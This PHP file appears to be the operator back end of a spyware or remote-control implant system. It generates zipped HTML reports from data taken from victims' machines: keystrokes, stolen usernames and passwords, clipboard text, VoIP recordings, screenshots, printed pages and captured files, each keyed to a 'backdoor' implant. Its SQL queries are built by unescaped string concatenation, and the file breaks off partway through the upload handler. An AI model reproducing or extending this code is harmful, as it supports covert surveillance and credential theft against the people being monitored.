<?php

require_once('db.inc.php');

function login($user, $pass)
{
   $ret = db_escape(array(&$user,
                          &$pass));

   if(is_string($ret)) {
      return;
   }

   $sql  = "SELECT `user`, ";
   $sql .=        "`level` ";
   $sql .= "FROM `user` ";
   $sql .= "WHERE (`user` = '$user') AND ";
   $sql .=       "(`pass` = SHA1('$pass'))";

   $ret = db_query($sql);

   if(!isset($ret[0]->user)) {
      return;
   }

   $_SESSION['authuser'] = $ret[0]->user;
   $_SESSION['authlevel'] = $ret[0]->level;

   return;
}

function logout()
{
   unset($_SESSION['authlevel']);

   return session_destroy();
}

function checklevel($level)
{
   if(isset($_SESSION['authlevel']) && (($_SESSION['authlevel'] & $level) == $level)) {
      return true;
   }

   return false;
}

function getparam()
{
   $sql  = "SELECT DISTINCT `backdoor`, ";
   $sql .=                 "`tag` ";
   $sql .= "FROM `log` ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`backdoor_id`)";

   $ret = db_query($sql);

   if(is_string($ret)) {
      return $ret;
   } else if($ret === false) {
      return false;
   }

   foreach(array('backdoor', 'tag') as $field) {
      $tmp->$field = array();
      foreach($ret as $r) {
         array_push($tmp->$field, $r->$field);
      }
      $tmp->$field = array_unique($tmp->$field);
      sort($tmp->$field);
   }

   $ret = $tmp;

   return $ret;
}

function create($backdoor, $tagarray, $begin, $end)
{
   if(!$backdoor || !count($tagarray)) {
      return false;
   }

   $sql  = "SELECT `log_id`, ";
   $sql .=        "`type` ";
   $sql .= "FROM `log` ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`backdoor_id`) ";
   $sql .= "WHERE `backdoor` = '$backdoor' AND ";
   $sql .=       "`tag` IN ('".implode("', '", $tagarray)."') ";
   if($begin && $end) {
      $sql .=       "AND `acquired` BETWEEN '$begin' AND '$end' ";
   }
   $sql .= "ORDER BY `acquired`";

   $ret = db_query($sql);

   $tmpfile = tempnam(sys_get_temp_dir(), 'blotter');
   copy('blotter.zip', $tmpfile);

   $zip = new ZipArchive;
   $zip->open($tmpfile);

   $html  = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">'."\n";
   $html .= '<html xmlns="http://www.w3.org/1999/xhtml">'."\n";
   $html .= '   <head>'."\n";
   $html .= '      <meta http-equiv="content-type" content="text/html; charset=utf-8" />'."\n";
   $html .= '      <title>Blotter</title>'."\n";
   $html .= '      <link rel="stylesheet" type="text/css" media="screen" href="styles.css" />'."\n";
   $html .= '   </head>'."\n";
   $html .= '   <body>'."\n";
   $html .= '      <div id="container">'."\n";

   foreach($ret as $r) {
      $func = "handle_{$r->type}";
      $html .= $func($r->log_id, $zip);
   }

   $html .= '      </div>'."\n";
   $html .= '   </body>'."\n";
   $html .= '</html>'."\n";

   $zip->addFromString('index.html', $html);
   $zip->close();

   $blotter = file_get_contents($tmpfile);
   unlink($tmpfile);

   return $blotter;
}

function handle_CONFIG($log_id, $zip)
{
   return;
}

function handle_PRINT($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/PRINT_'.$log_id.'.bmp" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> PRINT &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>JOB NAME:</strong> '.$ret->varchar1.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                     <td width="150">'."\n";
   $html .= '                        <a href="files/PRINT_'.$log_id.'.bmp">'."\n";
   $html .= '                           <img src="files/PRINT_'.$log_id.'.bmp" width="150" border="0">'."\n";
   $html .= '                        </a>'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/PRINT_{$log_id}.bmp", $ret->longblob1);

   return $html;
}

function handle_VOIP($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`int1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/VOIP_'.$log_id.'.mp3" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> VOIP &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>PEER:</strong> '.$ret->varchar1.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/VOIP_{$log_id}.mp3", $ret->longblob1);

   return $html;
}

function handle_CLIPBOARD($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`longtext1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/CLIPBOARD_'.$log_id.'.txt" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> CLIPBOARD &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>PROCESS:</strong> '.$ret->varchar1.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '                        <strong>WINDOW:</strong> '.$ret->varchar2.'<br /><br />'."\n";
   $html .= '                        <pre>'.chunk_split($ret->longtext1, 100).'</pre><br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/CLIPBOARD_{$log_id}.txt", $ret->longtext1);

   return $html;
}

function handle_KEYLOG($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`longtext1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/KEYLOG_'.$log_id.'.txt" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> KEYLOG &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>PROCESS:</strong> '.$ret->varchar1.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '                        <strong>WINDOW:</strong> '.$ret->varchar2.'<br /><br />'."\n";
   $html .= '                        <pre>'.chunk_split($ret->longtext1, 100).'</pre><br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/KEYLOG_{$log_id}.txt", $ret->longtext1);

   return $html;
}

function handle_URL($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`longtext1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/URL_'.$log_id.'.txt" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> URL &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <pre>'.chunk_split($ret->longtext1, 100).'</pre><br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/URL_{$log_id}.txt", $ret->longtext1);

   return $html;
}

function handle_PASSWORD($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`varchar4` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/PASSWORD_'.$log_id.'.txt" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> PASSWORD &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>RESOURCE:</strong> '.$ret->varchar1.'<br />'."\n";
   $html .= '                        <strong>SERVICE:</strong> '.$ret->varchar2.' <br />'."\n";
   $html .= '                        <strong>USERNAME: </strong>'.$ret->varchar4.' <br />'."\n";
   $html .= '                        <strong>PASSWORD:</strong> '.$ret->varchar3.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/PASSWORD_{$log_id}.txt", "RESOURCE: {$ret->varchar1}\nSERVICE: {$ret->varchar2}\nUSERNAME: {$ret->varchar4}\nPASSWORD: {$ret->varchar3}");

   return $html;
}

function handle_SNAPSHOT($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/SNAPSHOT_'.$log_id.'.bmp" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> SNAPSHOT &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                     <td width="250">'."\n";
   $html .= '                        <a href="files/SNAPSHOT_'.$log_id.'.bmp">'."\n";
   $html .= '                           <img src="files/SNAPSHOT_'.$log_id.'.bmp" width="250" border="0">'."\n";
   $html .= '                        </a>'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/SNAPSHOT_{$log_id}.bmp", $ret->longblob1);

   return $html;
}

function handle_FILECAP($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/FILECAP_'.$log_id.'_'.$ret->varchar1.'" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> FILECAP &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>FILENAME:</strong> '.$ret->varchar1.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/FILECAP_{$log_id}_{$ret->varchar1}", $ret->longblob1);

   return $html;
}

function handle_FILEOPEN($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`longtext1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/FILEOPEN_'.$log_id.'.txt" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> FILEOPEN &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>PROCESS:</strong> '.$ret->varchar1.'<br /><br />'."\n";
   $html .= '                        <strong>FILENAME:</strong> '.$ret->varchar2.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/FILEOPEN_{$log_id}.txt", $ret->varchar2);

   return $html;
}

function handle_DOWNLOAD($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/DOWNLOAD_'.$log_id.'_'.basename($ret->varchar1).'" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> DOWNLOAD &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>FILENAME:</strong> '.$ret->varchar1.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/DOWNLOAD_{$log_id}_".basename($ret->varchar1), $ret->longblob1);

   return $html;
}

function handle_UPLOAD($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
